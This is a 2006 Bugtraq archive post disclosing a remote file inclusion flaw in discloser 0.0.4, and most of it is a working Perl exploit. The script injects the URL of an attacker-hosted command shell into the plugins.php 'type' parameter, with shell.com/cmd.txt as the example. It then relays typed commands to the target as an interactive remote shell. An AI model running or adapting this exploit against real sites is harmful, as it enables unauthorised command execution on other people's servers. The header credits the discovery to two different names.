Bugtraq mailing list archives
discloser 0.0.4 Remote File Inclusion (with Exploit)
From: dr.t3rr0r1st () yahoo com
Date: 16 Aug 2006 21:51:24 -0000
#!/usr/bin/perl ########################################################################################### # Aria-Security.net Advisory # # Discovered by: Dr.t3rr0r1st # # < www.Aria-security.net > # # Gr33t to:Outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp # # Special Thanx To All Aria-Security Users # ########################################################################################### use LWP::UserAgent; print "\n === discloser 0.0.4 Remote File Inclusion\n"; print "\n === Discovered by OutLaw .\n"; print "\n === www.Aria-Security.Net\n"; $bPath = $ARGV[0]; $cmdo = $ARGV[1]; $bcmd = $ARGV[2]; if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()} while() { print "[Shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[ê]/; if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/) {print "\n Could Not Connect to cmd Host\n";exit} elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"} if($return =~ /(.*)/) { $freturn = $1; $freturn=~ tr/[ê]/[\n]/; print "\r\n$freturn\n\r"; last; } else {print "[Shell] \$";}}}last; sub usage() { print " Usage : discloser.pl [host] [cmd shell location] [cmd shell variable]\n"; print " Example : fusion.pl http://site.com/path http://www.shell.com/cmd.txt cmd\n"; exit(); }
Current thread:
- discloser 0.0.4 Remote File Inclusion (with Exploit) dr . t3rr0r1st (Aug 17)
- Re: discloser 0.0.4 Remote File Inclusion (with Exploit) Carsten Eilers (Aug 17)
- <Possible follow-ups>
- Re: Re: discloser 0.0.4 Remote File Inclusion (with Exploit) dr . t3rr0r1st (Aug 18)
- Re: discloser 0.0.4 Remote File Inclusion (with Exploit) Carsten Eilers (Aug 22)